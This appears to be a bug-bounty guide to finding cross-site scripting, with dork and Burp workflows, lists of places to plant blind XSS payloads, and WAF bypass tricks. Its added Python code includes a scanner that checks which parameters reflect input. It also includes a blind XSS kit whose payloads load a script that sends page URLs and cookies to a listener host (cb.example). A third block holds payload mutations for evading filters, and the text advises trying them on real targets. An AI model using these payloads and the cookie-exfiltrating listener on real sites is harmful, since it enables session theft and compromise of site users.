Many methods are out in the wild; here are a few of the most common, though the list is not exhaustive.
One awesome mind map for approaching reflected XSS can be found at https://github.com/A9HORA/Reflected-XSS-Mindmap (made by @A9HORA).
Tip: while working through the other methods, keep method 2 running in the background in a terminal or on a VPS.
Method 1:
- 1. Install the Reflection and Sentinel plugins for Burp.
- 2. Walk and spider the target site.
- 3. Check the reflected parameters tab in Burp.
- 4. Send those requests to Sentinel, or check them manually.
Method 2:
- 2. Filter the gathered URLs for parameters using grep "=" or gf patterns and store the result in a new file.
Method 3:
- 1. Use the Google dork site:target.com and filter the results.
- 2. Now search for links that carry parameters by adding more dorks, for example site:target.com filetype:php. You can find some dorks at https://www.openbugbounty.org/blog/devl00p/top-100-xss-dorks/ or google for them.
- 3. Check whether the parameter value is reflected in the HTML source.
- 4. Try an XSS payload there, or pass the URL to a tool.
Method 4:
- 2. You can also check manually: right-click, View Page Source, and search the source for input and parameter names.
- 3. Now append those parameters to the page URLs and check whether their values are reflected.
Method 5:
- 1. Use Method 1 or 2 to gather the URLs.
- 3. Find WAF bypass payloads by searching on Twitter, or in this GitHub repo: https://github.com/0xInfection/Awesome-WAF
Method 6:
- Check the error pages (404, 403, ...); sometimes they contain reflected values.
- Trigger a 403 by requesting the .htaccess file.
- Try every reflected parameter.
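The "filter the parameters" step and the "check if the param value is reflected" step above, done in code, as an added example that is not part of the original page. It takes a crawl list, keeps only URLs with query parameters, injects a canary plus the characters that matter for XSS into each parameter, and reports in which HTML context the canary came back and which of the probe characters survived unencoded. The target is a constructed stand-in (no network), and the host names, paths and canary string are assumptions chosen for illustration; in real use fake_fetch would be an HTTP GET.

```python
"""Added example, not code from the original page: the parameter-filtering and
reflection-check steps of the reflected XSS methods above, run offline against a
constructed stand-in for the target. Hosts, paths and the canary are assumptions."""
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit, urlunsplit, parse_qsl, urlencode

CANARY = "zq7x"          # marker unlikely to occur naturally or to be filtered
PROBE_CHARS = '<>"\'/'   # whether these survive decides which payloads are possible
ENCODINGS = {            # forms a neutralised probe character may come back in
    "<": ("&lt;", "%3C"), ">": ("&gt;", "%3E"),
    '"': ("&quot;", "&#34;", "&#x22;", "%22"),
    "'": ("&#x27;", "&#39;", "&apos;", "%27"), "/": ("&#x2F;", "%2F"),
}

def param_urls(urls):
    """The grep "=" step: keep only URLs that carry a query parameter, deduplicated."""
    seen, out = set(), []
    for u in urls:
        if "=" in urlsplit(u).query and u not in seen:
            seen.add(u)
            out.append(u)
    return out

def inject(url, param, value):
    """Return url with the value of one query parameter replaced."""
    parts = urlsplit(url)
    q = [(k, value if k == param else v) for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    return urlunsplit(parts._replace(query=urlencode(q)))

class _ReflectionFinder(HTMLParser):
    """Records each context (text node, attribute, script/style, comment) the canary lands in."""
    def __init__(self, canary):
        super().__init__(convert_charrefs=True)
        self.canary, self.contexts, self._tag = canary, [], None
    def handle_starttag(self, tag, attrs):
        self._tag = tag
        for name, value in attrs:
            if value and self.canary in value:
                kind = "attr-url-or-handler" if name.startswith("on") or name in ("href", "src", "action") else "attr"
                self.contexts.append(f"{kind}:{tag}@{name}")
    def handle_endtag(self, tag): self._tag = None
    def handle_data(self, data):
        if self.canary in data:
            self.contexts.append("script" if self._tag in ("script", "style") else "text")
    def handle_comment(self, data):
        if self.canary in data: self.contexts.append("comment")

def reflection_contexts(body, canary=CANARY):
    p = _ReflectionFinder(canary)
    p.feed(body)
    p.close()
    return p.contexts

def surviving_chars(body, canary=CANARY):
    """For a response to canary+PROBE_CHARS: walk the reflection and return the probe
    characters that came back verbatim. An encoded form is skipped over; anything
    else means the reflection was cut or stripped, so stop there."""
    pos = body.find(canary)
    if pos < 0:
        return ""
    pos += len(canary)
    survived = ""
    for c in PROBE_CHARS:
        if body.startswith(c, pos):
            survived += c
            pos += 1
            continue
        for enc in ENCODINGS[c]:
            if body[pos:pos + len(enc)].lower() == enc.lower():
                pos += len(enc)
                break
        else:
            break
    return survived

def fake_fetch(url):
    """Constructed stand-in for the target (assumption: no network here).
    Each path reflects its parameter in a different context, as real pages do."""
    parts = urlsplit(url)
    q = dict(parse_qsl(parts.query, keep_blank_values=True))
    if parts.path == "/search":   # raw into a text node: full tag injection possible
        return f"<h1>Results for {q.get('q', '')}</h1>"
    if parts.path == "/item":     # HTML-encoded inside an attribute value
        return f'<input name="id" value="{html.escape(q.get("id", ""), quote=True)}">'
    if parts.path == "/track":    # raw inside a JS string literal
        return f"<script>var ref = '{q.get('ref', '')}';</script>"
    return "<p>nothing reflected</p>"

def scan(urls, fetch=fake_fetch):
    """For every parameter of every parameterised URL: inject the probe, fetch, and
    return (url, param, contexts, surviving probe chars) for each reflection."""
    findings = []
    for url in param_urls(urls):
        for param, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True):
            body = fetch(inject(url, param, CANARY + PROBE_CHARS))
            contexts = reflection_contexts(body)
            if contexts:
                findings.append((url, param, contexts, surviving_chars(body)))
    return findings

SAMPLE_URLS = [  # constructed crawl output
    "https://target.example/search?q=shoes",
    "https://target.example/search?q=shoes",   # duplicate, dropped
    "https://target.example/about",            # no parameter, dropped
    "https://target.example/item?id=42",
    "https://target.example/track?ref=home",
]

if __name__ == "__main__":
    for url, param, contexts, chars in scan(SAMPLE_URLS):
        print(f"{url} [{param}] reflected in {contexts}; unencoded: {chars!r}")
```

The context plus the surviving characters tells you what to try next: a text node with `<` and `>` intact takes a plain tag, an attribute that encodes everything except `/` is a dead end for that sink, and a JS string where `'` survives only needs a quote to break out, no angle brackets at all.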
Stored XSS is mostly found manually.
- 1. Enumerate the firewall using the methods above and select a payload to test accordingly.
- 2. Try the selected WAF bypass payload while registering on the site, in fields like username, name, address, email, etc.
- 3. Try the payload in the file name of a profile picture, and also inside the image file itself.
- 4. Try the comment section anywhere on the target site.
- 5. Try every input field that is reflected in a page other users can see.
- 6. Try signing up with your name plus an XSS payload; that can lead to stored XSS.
Tips:
- For every input field:
  - Try to get an entity such as <a href=#>test</a> reflected in the page.
  - Try to get an obfuscated entity reflected in the page.
  - If anything catches, go deeper.
- Video: https://www.youtube.com/watch?v=uHy1x1NkwRU
- Writeup: https://medium.com/@fatin151485/how-i-found-my-first-stored-xss-on-popular-eboighar-com-6bd497b0bb96
Blind XSS is similar to reflected or stored XSS, but you do not see any reflection; instead you get a callback on your own server.
- 1. Use the same methods as above, but with a payload that calls back to your server when it executes.
- 3. Try it on contact forms or similar functionality.
- Copy every payload from your XSS Hunter payloads section and paste it into every field you see.
- XSS Hunter contains a payload for CSP bypass.
- Generate some variations of your payloads (for example, replace < with an encoded equivalent).
Common places to plant blind XSS payloads:
1- Review forms
2- Contact Us pages
3- Passwords (you never know whether the other side handles input properly, and your password may be shown somewhere in a view mode)
4- Address fields of e-commerce sites
5- First or last name field while making credit card payments
6- Set the User-Agent header to a blind XSS payload; you can do that easily from a proxy such as Burp Suite
7- Log viewers
8- Feedback pages
9- Chat applications
10- Any app that requires user moderation
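When you paste a callback payload into every field of every form, the thing you need most when a hit finally arrives is to know which field fired. This added example, which is not code from the original page or from XSS Hunter, shows the mechanics behind that: each payload carries the name of its injection point in the script URL, the listener serves a second stage that beacons the page URL, referrer, title and cookies back, and the decoder turns the beacon into a record. The host cb.example, port 8080 and the point names are assumptions; any listener you control works the same way.

```python
"""Added example, not code from the original page: blind XSS payloads tagged
with their injection point, the second stage they load, and the listener that
decodes the callback. cb.example is an assumed listener host you control."""
import base64
import json
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, quote, unquote, urlsplit

CALLBACK = "https://cb.example"   # assumption: your listener, reachable from the victim's browser

def tagged_payload(point):
    """Payload to plant at one injection point (form field, User-Agent, ...).
    The script URL carries the point name, so the listener learns it on load.
    The leading "> closes an attribute if the sink is one; in a text node it is harmless."""
    return f'"><script src="{CALLBACK}/p/{quote(point, safe="")}.js"></script>'

def stage2_js(point):
    """Second stage served for /p/<point>.js: beacon the page's details back as
    base64 JSON in an image request. document.cookie is empty for HttpOnly
    cookies, and a strict CSP blocks the script load in the first place."""
    return ("(function(){var d={p:" + json.dumps(point) + ",u:location.href,"
            "r:document.referrer,c:document.cookie,t:document.title};"
            "new Image().src=" + json.dumps(CALLBACK + "/x?d=") +
            "+encodeURIComponent(btoa(unescape(encodeURIComponent(JSON.stringify(d)))));})();")

def encode_callback(details):
    """The request the beacon above produces, built in Python (same base64-of-UTF-8
    scheme as the JavaScript), used to exercise the decoder offline."""
    raw = base64.b64encode(json.dumps(details).encode("utf-8")).decode("ascii")
    return "/x?d=" + quote(raw, safe="")

def parse_callback(url):
    """Decode a beacon request (path or full URL) back into the details dict."""
    q = parse_qs(urlsplit(url).query)
    return json.loads(base64.b64decode(q["d"][0]).decode("utf-8"))

class Listener(BaseHTTPRequestHandler):
    """Serves the second stage and records every decoded hit in Listener.hits."""
    hits = []
    def do_GET(self):
        path = urlsplit(self.path).path
        if path.startswith("/p/") and path.endswith(".js"):
            body = stage2_js(unquote(path[3:-3])).encode("utf-8")
            self.send_response(200)
            self.send_header("Content-Type", "application/javascript")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        elif path == "/x":
            hit = parse_callback(self.path)
            Listener.hits.append(hit)
            print(f"[fired] point={hit.get('p')} url={hit.get('u')} cookie={hit.get('c')!r}")
            self.send_response(204)
            self.end_headers()
        else:
            self.send_response(404)
            self.end_headers()
    def log_message(self, *_):   # keep stdout to the hits only
        pass

INJECTION_POINTS = [  # assumed names for the places the list above suggests
    "contact:message", "profile:name", "checkout:address", "header:user-agent",
]

if __name__ == "__main__":
    for point in INJECTION_POINTS:
        print(point, "->", tagged_payload(point))
    HTTPServer(("0.0.0.0", 8080), Listener).serve_forever()   # assumption: port 8080, TLS terminated in front
```

A hit's `u` field is what makes the finding actionable: a payload planted in a contact form that fires from an internal ticketing URL tells you exactly which back-office page rendered the message unescaped. When the callback host must be HTTPS (mixed-content rules block an http:// script on an https:// page), put a TLS terminator in front of the listener rather than serving plain HTTP on the port above.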
- Manually looking for DOM XSS is not recommended.
- The Burp Suite Pro scanner can find DOM XSS.
- Tool: https://github.com/dpnishant/ra2-dom-xss-scanner
- < and > can be replaced with HTML entities (this helps where the reflected value is decoded again before it reaches the sink, for example an attribute value).
- You can try an XSS polyglot.
- Check whether the firewall blocks only lowercase; try mixed case.
- Try to break the firewall's regex with a new line (\r\n).
- Try double encoding.
- Test for non-recursive filters: if the firewall removes a blocked string only once, nest that string inside a copy of itself so that what remains after the removal is a clean payload.
- Inject an anchor tag without whitespace, using / as the separator and tab characters inside the scheme.
Ex:- <a/href="j	a	v	asc	ri	pt:alert(1)"> (the gaps inside the scheme are tab characters)
- Try to bypass whitespace filters using a bullet character.
- Try changing the request method.
Ex:- GET /?q=xss -> POST / (with q=xss in the body)
- Try CRLF injection.
Ex:- GET /%0A%0DValue=%20Virus
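The bypass tips above, written out as payload mutations and tried against toy filters that model the weakness each tip exploits: a case-sensitive keyword match, an anchored regex whose `.` cannot cross a newline, a WAF that percent-decodes once while the application decodes twice, and a single-pass strip of `<script>` compared with a recursive one. This is an added example, not code from the original page or from any real WAF; the filters are constructed for illustration, and whether a mutated payload actually fires is still decided by the browser, which is why the tab-in-scheme and CRLF tricks work (browsers strip tab and newline inside a URL and treat CR LF as whitespace between attributes).

```python
"""Added example, not code from the original page: the WAF bypass tips above as
payload mutations, checked against constructed toy filters that each model one
real filter weakness. None of these filters is a real WAF's rule set."""
import re
from urllib.parse import quote, unquote

# --- mutations, one per tip ---------------------------------------------------
def mixed_case(payload):
    """Alternate letter case: beats a filter that only matches lowercase."""
    return "".join(ch.upper() if i % 2 else ch.lower() for i, ch in enumerate(payload))

def entity_brackets(payload):
    """< and > as HTML entities: only useful where the sink decodes entities."""
    return payload.replace("<", "&lt;").replace(">", "&gt;")

def double_encode(payload):
    """Percent-encode twice: gets past a WAF that decodes once before matching
    when the application decodes a second time."""
    return quote(quote(payload, safe=""), safe="")

def crlf_split(payload, before="onerror"):
    """Put CR LF in front of an attribute: the browser sees whitespace, but '.'
    in a regex without DOTALL does not match across the '\\n'."""
    return payload.replace(" " + before, "\r\n" + before, 1)

def tab_scheme(payload):
    """The tabbed javascript: scheme from the tip above; browsers strip ASCII tab
    and newline from a URL before parsing it, a substring check does not."""
    return payload.replace("javascript:", "j\ta\tv\tascript:")

def nest_script(payload):
    """Wrap <script> and </script> inside copies of themselves: a single-pass
    removal of the inner tags leaves the original tags behind."""
    return payload.replace("<script>", "<scr<script>ipt>").replace("</script>", "</scr</script>ipt>")

# --- toy filters (constructed; True means the request is blocked) --------------
def waf_lowercase(value):
    """Case-sensitive keyword match."""
    return "<script" in value or "javascript:" in value

def waf_anchored_regex(value):
    """Anchored pattern without re.DOTALL: '.' stops at a newline."""
    return re.search(r"^.*on\w+\s*=.*$", value) is not None

def waf_single_decode(value):
    """Decodes percent-encoding once, then looks for a tag opener."""
    return "<" in unquote(value)

def strip_script_once(value):
    """Sanitiser that removes script tags in one pass (non-recursive)."""
    return re.sub(r"</?script>", "", value, flags=re.I)

def strip_script_recursive(value):
    """Same removal applied until nothing changes; the nesting trick fails here."""
    prev = None
    while prev != value:
        prev, value = value, strip_script_once(value)
    return value

def bypass_table():
    """Which mutation gets a payload past which toy filter (True = blocked)."""
    script, img = "<script>alert(1)</script>", "<img src=x onerror=alert(1)>"
    link = '<a href="javascript:alert(1)">x</a>'
    return {
        "lowercase: plain": waf_lowercase(script), "lowercase: mixed case": waf_lowercase(mixed_case(script)),
        "lowercase: tab scheme": waf_lowercase(tab_scheme(link)),
        "regex: plain": waf_anchored_regex(img), "regex: crlf": waf_anchored_regex(crlf_split(img)),
        "decode-once: plain": waf_single_decode(quote(img, safe="")),
        "decode-once: double": waf_single_decode(double_encode(img)),
        "strip-once leaves": strip_script_once(nest_script(script)),
        "strip-recursive leaves": strip_script_recursive(nest_script(script)),
    }

if __name__ == "__main__":
    for name, result in bypass_table().items():
        print(f"{name:24} {result!r}")
```

The last two entries are the "recursive filter" tip: the nested payload `<scr<script>ipt>alert(1)</scr</script>ipt>` comes out of the single-pass sanitiser as a clean `<script>alert(1)</script>`, while the recursive one reduces it to bare text. Run the same table against the real target by replacing each toy filter with a request and a check of the response, one mutation at a time, so you learn which layer (WAF, framework, sanitiser) is doing the blocking.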